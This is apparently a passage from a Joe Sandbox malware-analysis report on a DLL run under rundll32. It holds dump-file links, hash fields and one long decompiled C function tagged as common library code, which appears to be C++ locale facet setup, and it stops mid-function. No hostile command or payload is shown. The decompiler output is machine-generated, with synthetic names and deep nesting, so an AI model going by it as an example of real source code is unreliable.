Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: 8k,n
API String ID: 1394824916-3277982818
Opcode ID: dfef0be74a9ee87519e02a32c5871714b09756194fae8221ac19bc58ee90b160
Instruction ID: b6c44b0feb4037195d911b7b5e00fb8f9856d6b3a6d158228e63df7fbba6607d
Opcode Fuzzy Hash: dfef0be74a9ee87519e02a32c5871714b09756194fae8221ac19bc58ee90b160
Instruction Fuzzy Hash: A011A3B5A1051D9BCF01DBE4C898AEDB77BAF44B14F140919E4106B2D0DFB49A44C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F0DD, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E20F0DD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t279;
				signed int _t280;
				void* _t292;
				void* _t305;
				void* _t318;
				void* _t331;
				void* _t344;
				void* _t357;
				void* _t370;
				void* _t383;
				void* _t396;
				void* _t409;
				void* _t422;
				void* _t435;
				void* _t448;
				void* _t461;
				void* _t474;
				void* _t487;
				void* _t500;
				void* _t513;
				signed int _t739;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				void* _t858;

				_t797 = __edx;
				_t606 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t858 - 0x14, 0);
				_t819 =  *0x6e2c6dd4; // 0x0
				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
				 *(_t858 - 0x10) = _t819;
				_t279 = E6E1E161C(0x6e2c6b28);
				_t609 =  *((intOrPtr*)(_t858 + 8));
				_t280 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t279);
				_t799 = _t280;
				if(_t280 != 0) {
					L5:
					E6E2066BA(_t858 - 0x14);
					return E6E220075(_t799);
				} else {
					if(_t819 == 0) {
						_push( *((intOrPtr*)(_t858 + 8)));
						_push(_t858 - 0x10);
						__eflags = E6E210E47(__ebx, _t609, __edx, _t799, _t819) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t858 - 0x20);
							E6E223D74(_t858 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t799, _t819, 0x14);
							E6E206653(_t858 - 0x14, 0);
							_t820 =  *0x6e2c6de8; // 0x0
							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
							 *(_t858 - 0x10) = _t820;
							_t292 = E6E1E161C(0x6e2c6d94);
							_t616 =  *((intOrPtr*)(_t858 + 8));
							_t800 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t292);
							__eflags = _t800;
							if(_t800 != 0) {
								L12:
								E6E2066BA(_t858 - 0x14);
								return E6E220075(_t800);
							} else {
								__eflags = _t820;
								if(_t820 == 0) {
									_push( *((intOrPtr*)(_t858 + 8)));
									_push(_t858 - 0x10);
									__eflags = E6E210EB7(_t606, _t616, __edx, _t800, _t820) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t858 - 0x20);
										E6E223D74(_t858 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t606, _t800, _t820, 0x14);
										E6E206653(_t858 - 0x14, 0);
										_t821 =  *0x6e2c6db8; // 0x0
										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
										 *(_t858 - 0x10) = _t821;
										_t305 = E6E1E161C(0x6e2c6d6c);
										_t623 =  *((intOrPtr*)(_t858 + 8));
										_t801 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t305);
										__eflags = _t801;
										if(_t801 != 0) {
											L19:
											E6E2066BA(_t858 - 0x14);
											return E6E220075(_t801);
										} else {
											__eflags = _t821;
											if(_t821 == 0) {
												_push( *((intOrPtr*)(_t858 + 8)));
												_push(_t858 - 0x10);
												__eflags = E6E210F1F(_t606, _t623, __edx, _t801, _t821) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t858 - 0x20);
													E6E223D74(_t858 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t606, _t801, _t821, 0x14);
													E6E206653(_t858 - 0x14, 0);
													_t822 =  *0x6e2c6dec; // 0x0
													 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
													 *(_t858 - 0x10) = _t822;
													_t318 = E6E1E161C(0x6e2c6d98);
													_t630 =  *((intOrPtr*)(_t858 + 8));
													_t802 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t318);
													__eflags = _t802;
													if(_t802 != 0) {
														L26:
														E6E2066BA(_t858 - 0x14);
														return E6E220075(_t802);
													} else {
														__eflags = _t822;
														if(_t822 == 0) {
															_push( *((intOrPtr*)(_t858 + 8)));
															_push(_t858 - 0x10);
															__eflags = E6E210F87(_t606, _t630, _t797, _t802, _t822) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t858 - 0x20);
																E6E223D74(_t858 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t606, _t802, _t822, 0x14);
																E6E206653(_t858 - 0x14, 0);
																_t823 =  *0x6e2c6dbc; // 0x0
																 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																 *(_t858 - 0x10) = _t823;
																_t331 = E6E1E161C(0x6e2c6d70);
																_t637 =  *((intOrPtr*)(_t858 + 8));
																_t803 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t331);
																__eflags = _t803;
																if(_t803 != 0) {
																	L33:
																	E6E2066BA(_t858 - 0x14);
																	return E6E220075(_t803);
																} else {
																	__eflags = _t823;
																	if(_t823 == 0) {
																		_push( *((intOrPtr*)(_t858 + 8)));
																		_push(_t858 - 0x10);
																		__eflags = E6E210FEF(_t606, _t637, _t797, _t803, _t823) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t858 - 0x20);
																			E6E223D74(_t858 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t606, _t803, _t823, 0x14);
																			E6E206653(_t858 - 0x14, 0);
																			_t824 =  *0x6e2c6df0; // 0x0
																			 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																			 *(_t858 - 0x10) = _t824;
																			_t344 = E6E1E161C(0x6e2c6d9c);
																			_t644 =  *((intOrPtr*)(_t858 + 8));
																			_t804 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t344);
																			__eflags = _t804;
																			if(_t804 != 0) {
																				L40:
																				E6E2066BA(_t858 - 0x14);
																				return E6E220075(_t804);
																			} else {
																				__eflags = _t824;
																				if(_t824 == 0) {
																					_push( *((intOrPtr*)(_t858 + 8)));
																					_push(_t858 - 0x10);
																					__eflags = E6E211057(_t606, _t644, _t797, _t804, _t824) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t858 - 0x20);
																						E6E223D74(_t858 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t606, _t804, _t824, 0x14);
																						E6E206653(_t858 - 0x14, 0);
																						_t825 =  *0x6e2c6dc0; // 0x0
																						 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																						 *(_t858 - 0x10) = _t825;
																						_t357 = E6E1E161C(0x6e2c6d74);
																						_t651 =  *((intOrPtr*)(_t858 + 8));
																						_t805 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t357);
																						__eflags = _t805;
																						if(_t805 != 0) {
																							L47:
																							E6E2066BA(_t858 - 0x14);
																							return E6E220075(_t805);
																						} else {
																							__eflags = _t825;
																							if(_t825 == 0) {
																								_push( *((intOrPtr*)(_t858 + 8)));
																								_push(_t858 - 0x10);
																								__eflags = E6E2110BF(_t606, _t651, _t797, _t805, _t825) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t858 - 0x20);
																									E6E223D74(_t858 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t606, _t805, _t825, 0x14);
																									E6E206653(_t858 - 0x14, 0);
																									_t826 =  *0x6e2c6df8; // 0x0
																									 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																									 *(_t858 - 0x10) = _t826;
																									_t370 = E6E1E161C(0x6e2c6da4);
																									_t658 =  *((intOrPtr*)(_t858 + 8));
																									_t806 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t370);
																									__eflags = _t806;
																									if(_t806 != 0) {
																										L54:
																										E6E2066BA(_t858 - 0x14);
																										return E6E220075(_t806);
																									} else {
																										__eflags = _t826;
																										if(_t826 == 0) {
																											_push( *((intOrPtr*)(_t858 + 8)));
																											_push(_t858 - 0x10);
																											__eflags = E6E211127(_t606, _t658, _t797, _t806, _t826) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t858 - 0x20);
																												E6E223D74(_t858 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t606, _t806, _t826, 0x14);
																												E6E206653(_t858 - 0x14, 0);
																												_t827 =  *0x6e2c6df4; // 0x0
																												 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																												 *(_t858 - 0x10) = _t827;
																												_t383 = E6E1E161C(0x6e2c6da0);
																												_t665 =  *((intOrPtr*)(_t858 + 8));
																												_t807 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t383);
																												__eflags = _t807;
																												if(_t807 != 0) {
																													L61:
																													E6E2066BA(_t858 - 0x14);
																													return E6E220075(_t807);
																												} else {
																													__eflags = _t827;
																													if(_t827 == 0) {
																														_push( *((intOrPtr*)(_t858 + 8)));
																														_push(_t858 - 0x10);
																														__eflags = E6E2111AB(_t606, _t665, _t797, _t807, _t827) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t858 - 0x20);
																															E6E223D74(_t858 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t606, _t807, _t827, 0x14);
																															E6E206653(_t858 - 0x14, 0);
																															_t828 =  *0x6e2c6dc8; // 0x0
																															 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																															 *(_t858 - 0x10) = _t828;
																															_t396 = E6E1E161C(0x6e2c6d7c);
																															_t672 =  *((intOrPtr*)(_t858 + 8));
																															_t808 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t396);
																															__eflags = _t808;
																															if(_t808 != 0) {
																																L68:
																																E6E2066BA(_t858 - 0x14);
																																return E6E220075(_t808);
																															} else {
																																__eflags = _t828;
																																if(_t828 == 0) {
																																	_push( *((intOrPtr*)(_t858 + 8)));
																																	_push(_t858 - 0x10);
																																	__eflags = E6E211230(_t606, _t672, _t797, _t808, _t828) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t858 - 0x20);
																																		E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t606, _t808, _t828, 0x14);
																																		E6E206653(_t858 - 0x14, 0);
																																		_t829 =  *0x6e2c6dc4; // 0x0
																																		 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																		 *(_t858 - 0x10) = _t829;
																																		_t409 = E6E1E161C(0x6e2c6d78);
																																		_t679 =  *((intOrPtr*)(_t858 + 8));
																																		_t809 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t409);
																																		__eflags = _t809;
																																		if(_t809 != 0) {
																																			L75:
																																			E6E2066BA(_t858 - 0x14);
																																			return E6E220075(_t809);
																																		} else {
																																			__eflags = _t829;
																																			if(_t829 == 0) {
																																				_push( *((intOrPtr*)(_t858 + 8)));
																																				_push(_t858 - 0x10);
																																				__eflags = E6E2112B4(_t606, _t679, _t797, _t809, _t829) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t858 - 0x20);
																																					E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t606, _t809, _t829, 0x14);
																																					E6E206653(_t858 - 0x14, 0);
																																					_t830 =  *0x6e2c6dd8; // 0x0
																																					 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																					 *(_t858 - 0x10) = _t830;
																																					_t422 = E6E1E161C(0x6e2c6d84);
																																					_t686 =  *((intOrPtr*)(_t858 + 8));
																																					_t810 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t422);
																																					__eflags = _t810;
																																					if(_t810 != 0) {
																																						L82:
																																						E6E2066BA(_t858 - 0x14);
																																						return E6E220075(_t810);
																																					} else {
																																						__eflags = _t830;
																																						if(_t830 == 0) {
																																							_push( *((intOrPtr*)(_t858 + 8)));
																																							_push(_t858 - 0x10);
																																							__eflags = E6E211339(_t606, _t686, _t797, _t810, _t830) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t858 - 0x20);
																																								E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t606, _t810, _t830, 0x14);
																																								E6E206653(_t858 - 0x14, 0);
																																								_t831 =  *0x6e2c6db0; // 0x0
																																								 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																								 *(_t858 - 0x10) = _t831;
																																								_t435 = E6E1E161C(0x6e2c6d64);
																																								_t693 =  *((intOrPtr*)(_t858 + 8));
																																								_t811 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t435);
																																								__eflags = _t811;
																																								if(_t811 != 0) {
																																									L89:
																																									E6E2066BA(_t858 - 0x14);
																																									return E6E220075(_t811);
																																								} else {
																																									__eflags = _t831;
																																									if(_t831 == 0) {
																																										_push( *((intOrPtr*)(_t858 + 8)));
																																										_push(_t858 - 0x10);
																																										__eflags = E6E2113A1(_t606, _t693, _t797, _t811, _t831) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t858 - 0x20);
																																											E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t606, _t811, _t831, 0x14);
																																											E6E206653(_t858 - 0x14, 0);
																																											_t832 =  *0x6e2c6ddc; // 0x0
																																											 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																											 *(_t858 - 0x10) = _t832;
																																											_t448 = E6E1E161C(0x6e2c6d88);
																																											_t700 =  *((intOrPtr*)(_t858 + 8));
																																											_t812 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t448);
																																											__eflags = _t812;
																																											if(_t812 != 0) {
																																												L96:
																																												E6E2066BA(_t858 - 0x14);
																																												return E6E220075(_t812);
																																											} else {
																																												__eflags = _t832;
																																												if(_t832 == 0) {
																																													_push( *((intOrPtr*)(_t858 + 8)));
																																													_push(_t858 - 0x10);
																																													__eflags = E6E211409(_t606, _t700, _t797, _t812, _t832) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t858 - 0x20);
																																														E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t606, _t812, _t832, 0x14);
																																														E6E206653(_t858 - 0x14, 0);
																																														_t833 =  *0x6e2c6de0; // 0x0
																																														 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																														 *(_t858 - 0x10) = _t833;
																																														_t461 = E6E1E161C(0x6e2c6d8c);
																																														_t707 =  *((intOrPtr*)(_t858 + 8));
																																														_t813 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t461);
																																														__eflags = _t813;
																																														if(_t813 != 0) {
																																															L103:
																																															E6E2066BA(_t858 - 0x14);
																																															return E6E220075(_t813);
																																														} else {
																																															__eflags = _t833;
																																															if(_t833 == 0) {
																																																_push( *((intOrPtr*)(_t858 + 8)));
																																																_push(_t858 - 0x10);
																																																__eflags = E6E211471(_t606, _t707, _t797, _t813, _t833) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t858 - 0x20);
																																																	E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t606, _t813, _t833, 0x14);
																																																	E6E206653(_t858 - 0x14, 0);
																																																	_t834 =  *0x6e2c6dfc; // 0x0
																																																	 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																	 *(_t858 - 0x10) = _t834;
																																																	_t474 = E6E1E161C(0x6e2c6da8);
																																																	_t714 =  *((intOrPtr*)(_t858 + 8));
																																																	_t814 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t474);
																																																	__eflags = _t814;
																																																	if(_t814 != 0) {
																																																		L110:
																																																		E6E2066BA(_t858 - 0x14);
																																																		return E6E220075(_t814);
																																																	} else {
																																																		__eflags = _t834;
																																																		if(_t834 == 0) {
																																																			_push( *((intOrPtr*)(_t858 + 8)));
																																																			_push(_t858 - 0x10);
																																																			__eflags = E6E2114EC(_t606, _t714, _t797, _t814, _t834) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1E1438(_t858 - 0x20);
																																																				E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																																				asm("int3");
																																																				E6E2200AC(0x6e2683cf, _t606, _t814, _t834, 0x14);
																																																				E6E206653(_t858 - 0x14, 0);
																																																				_t835 =  *0x6e2c6dcc; // 0x0
																																																				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																				 *(_t858 - 0x10) = _t835;
																																																				_t487 = E6E1E161C(0x6e2c6d80);
																																																				_t721 =  *((intOrPtr*)(_t858 + 8));
																																																				_t815 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t487);
																																																				__eflags = _t815;
																																																				if(_t815 != 0) {
																																																					L117:
																																																					E6E2066BA(_t858 - 0x14);
																																																					return E6E220075(_t815);
																																																				} else {
																																																					__eflags = _t835;
																																																					if(_t835 == 0) {
																																																						_push( *((intOrPtr*)(_t858 + 8)));
																																																						_push(_t858 - 0x10);
																																																						__eflags = E6E211558(_t606, _t721, _t797, _t815, _t835) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1E1438(_t858 - 0x20);
																																																							E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																																							asm("int3");
																																																							E6E2200AC(0x6e2683cf, _t606, _t815, _t835, 0x14);
																																																							E6E206653(_t858 - 0x14, 0);
																																																							_t836 =  *0x6e2c6e00; // 0x0
																																																							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																							 *(_t858 - 0x10) = _t836;
																																																							_t500 = E6E1E161C(0x6e2c6dac);
																																																							_t728 =  *((intOrPtr*)(_t858 + 8));
																																																							_t816 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t500);
																																																							__eflags = _t816;
																																																							if(_t816 != 0) {
																																																								L124:
																																																								E6E2066BA(_t858 - 0x14);
																																																								return E6E220075(_t816);
																																																							} else {
																																																								__eflags = _t836;
																																																								if(_t836 == 0) {
																																																									_push( *((intOrPtr*)(_t858 + 8)));
																																																									_push(_t858 - 0x10);
																																																									__eflags = E6E2115C4(_t606, _t728, _t797, _t816, _t836) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6E1E1438(_t858 - 0x20);
																																																										E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																																										asm("int3");
																																																										E6E2200AC(0x6e2683cf, _t606, _t816, _t836, 0x14);
																																																										E6E206653(_t858 - 0x14, 0);
																																																										_t837 =  *0x6e2c6dd0; // 0x0
																																																										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																										 *(_t858 - 0x10) = _t837;
																																																										_t513 = E6E1E161C(0x6e2c6d60);
																																																										_t735 =  *((intOrPtr*)(_t858 + 8));
																																																										_t817 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t513);
																																																										__eflags = _t817;
																																																										if(_t817 != 0) {
																																																											L131:
																																																											E6E2066BA(_t858 - 0x14);
																																																											return E6E220075(_t817);
																																																										} else {
																																																											__eflags = _t837;
																																																											if(_t837 == 0) {
																																																												_push( *((intOrPtr*)(_t858 + 8)));
																																																												_push(_t858 - 0x10);
																																																												__eflags = E6E21162A(_t606, _t735, _t797, _t817, _t837) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													_t739 = _t858 - 0x20;
																																																													E6E1E1438(_t739);
																																																													E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																																													asm("int3");
																																																													E6E2200AC(0x6e26851f, _t606, _t817, _t837, 4);
																																																													_t838 = _t739;
																																																													 *(_t858 - 0x10) = _t838;
																																																													 *((intOrPtr*)(_t838 + 4)) =  *((intOrPtr*)(_t858 + 0xc));
																																																													_push( *((intOrPtr*)(_t858 + 0x14)));
																																																													_t273 = _t858 - 4;
																																																													 *_t273 =  *(_t858 - 4) & 0x00000000;
																																																													__eflags =  *_t273;
																																																													 *_t838 = 0x6e26c0c4;
																																																													 *((char*)(_t838 + 0x28)) =  *((intOrPtr*)(_t858 + 0x10));
																																																													E6E21542F(_t606, _t739, _t797, _t817, _t838,  *_t273);
																																																													return E6E220075(_t838,  *((intOrPtr*)(_t858 + 8)));
																																																												} else {
																																																													_t817 =  *(_t858 - 0x10);
																																																													 *(_t858 - 0x10) = _t817;
																																																													 *(_t858 - 4) = 1;
																																																													E6E206FD3(__eflags, _t817);
																																																													 *0x6e26a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t817 + 4))))();
																																																													 *0x6e2c6dd0 = _t817;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t817 = _t837;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t816 =  *(_t858 - 0x10);
																																																										 *(_t858 - 0x10) = _t816;
																																																										 *(_t858 - 4) = 1;
																																																										E6E206FD3(__eflags, _t816);
																																																										 *0x6e26a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t816 + 4))))();
																																																										 *0x6e2c6e00 = _t816;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t816 = _t836;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t815 =  *(_t858 - 0x10);
																																																							 *(_t858 - 0x10) = _t815;
																																																							 *(_t858 - 4) = 1;
																																																							E6E206FD3(__eflags, _t815);
																																																							 *0x6e26a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t815 + 4))))();
																																																							 *0x6e2c6dcc = _t815;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t815 = _t835;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t814 =  *(_t858 - 0x10);
																																																				 *(_t858 - 0x10) = _t814;
																																																				 *(_t858 - 4) = 1;
																																																				E6E206FD3(__eflags, _t814);
																																																				 *0x6e26a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t814 + 4))))();
																																																				 *0x6e2c6dfc = _t814;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t814 = _t834;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t813 =  *(_t858 - 0x10);
																																																	 *(_t858 - 0x10) = _t813;
																																																	 *(_t858 - 4) = 1;
																																																	E6E206FD3(__eflags, _t813);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t813 + 4))))();
																																																	 *0x6e2c6de0 = _t813;
																																																	goto L103;
																																																}
																																															} else {
																																																_t813 = _t833;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t812 =  *(_t858 - 0x10);
																																														 *(_t858 - 0x10) = _t812;
																																														 *(_t858 - 4) = 1;
																																														E6E206FD3(__eflags, _t812);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t812 + 4))))();
																																														 *0x6e2c6ddc = _t812;
																																														goto L96;
																																													}
																																												} else {
																																													_t812 = _t832;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t811 =  *(_t858 - 0x10);
																																											 *(_t858 - 0x10) = _t811;
																																											 *(_t858 - 4) = 1;
																																											E6E206FD3(__eflags, _t811);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t811 + 4))))();
																																											 *0x6e2c6db0 = _t811;
																																											goto L89;
																																										}
																																									} else {
																																										_t811 = _t831;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t810 =  *(_t858 - 0x10);
																																								 *(_t858 - 0x10) = _t810;
																																								 *(_t858 - 4) = 1;
																																								E6E206FD3(__eflags, _t810);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t810 + 4))))();
																																								 *0x6e2c6dd8 = _t810;
																																								goto L82;
																																							}
																																						} else {
																																							_t810 = _t830;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t809 =  *(_t858 - 0x10);
																																					 *(_t858 - 0x10) = _t809;
																																					 *(_t858 - 4) = 1;
																																					E6E206FD3(__eflags, _t809);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t809 + 4))))();
																																					 *0x6e2c6dc4 = _t809;
																																					goto L75;
																																				}
																																			} else {
																																				_t809 = _t829;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t808 =  *(_t858 - 0x10);
																																		 *(_t858 - 0x10) = _t808;
																																		 *(_t858 - 4) = 1;
																																		E6E206FD3(__eflags, _t808);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t808 + 4))))();
																																		 *0x6e2c6dc8 = _t808;
																																		goto L68;
																																	}
																																} else {
																																	_t808 = _t828;
																																	goto L68;
																																}
																															}
																														} else {
																															_t807 =  *(_t858 - 0x10);
																															 *(_t858 - 0x10) = _t807;
																															 *(_t858 - 4) = 1;
																															E6E206FD3(__eflags, _t807);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t807 + 4))))();
																															 *0x6e2c6df4 = _t807;
																															goto L61;
																														}
																													} else {
																														_t807 = _t827;
																														goto L61;
																													}
																												}
																											} else {
																												_t806 =  *(_t858 - 0x10);
																												 *(_t858 - 0x10) = _t806;
																												 *(_t858 - 4) = 1;
																												E6E206FD3(__eflags, _t806);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t806 + 4))))();
																												 *0x6e2c6df8 = _t806;
																												goto L54;
																											}
																										} else {
																											_t806 = _t826;
																											goto L54;
																										}
																									}
																								} else {
																									_t805 =  *(_t858 - 0x10);
																									 *(_t858 - 0x10) = _t805;
																									 *(_t858 - 4) = 1;
																									E6E206FD3(__eflags, _t805);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t805 + 4))))();
																									 *0x6e2c6dc0 = _t805;
																									goto L47;
																								}
																							} else {
																								_t805 = _t825;
																								goto L47;
																							}
																						}
																					} else {
																						_t804 =  *(_t858 - 0x10);
																						 *(_t858 - 0x10) = _t804;
																						 *(_t858 - 4) = 1;
																						E6E206FD3(__eflags, _t804);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t804 + 4))))();
																						 *0x6e2c6df0 = _t804;
																						goto L40;
																					}
																				} else {
																					_t804 = _t824;
																					goto L40;
																				}
																			}
																		} else {
																			_t803 =  *(_t858 - 0x10);
																			 *(_t858 - 0x10) = _t803;
																			 *(_t858 - 4) = 1;
																			E6E206FD3(__eflags, _t803);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t803 + 4))))();
																			 *0x6e2c6dbc = _t803;
																			goto L33;
																		}
																	} else {
																		_t803 = _t823;
																		goto L33;
																	}
																}
															} else {
																_t802 =  *(_t858 - 0x10);
																 *(_t858 - 0x10) = _t802;
																 *(_t858 - 4) = 1;
																E6E206FD3(__eflags, _t802);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t802 + 4))))();
																 *0x6e2c6dec = _t802;
																goto L26;
															}
														} else {
															_t802 = _t822;
															goto L26;
														}
													}
												} else {
													_t801 =  *(_t858 - 0x10);
													 *(_t858 - 0x10) = _t801;
													 *(_t858 - 4) = 1;
													E6E206FD3(__eflags, _t801);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t801 + 4))))();
													 *0x6e2c6db8 = _t801;
													goto L19;
												}
											} else {
												_t801 = _t821;
												goto L19;
											}
										}
									} else {
										_t800 =  *(_t858 - 0x10);
										 *(_t858 - 0x10) = _t800;
										 *(_t858 - 4) = 1;
										E6E206FD3(__eflags, _t800);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t800 + 4))))();
										 *0x6e2c6de8 = _t800;
										goto L12;
									}
								} else {
									_t800 = _t820;
									goto L12;
								}
							}
						} else {
							_t799 =  *(_t858 - 0x10);
							 *(_t858 - 0x10) = _t799;
							 *(_t858 - 4) = 1;
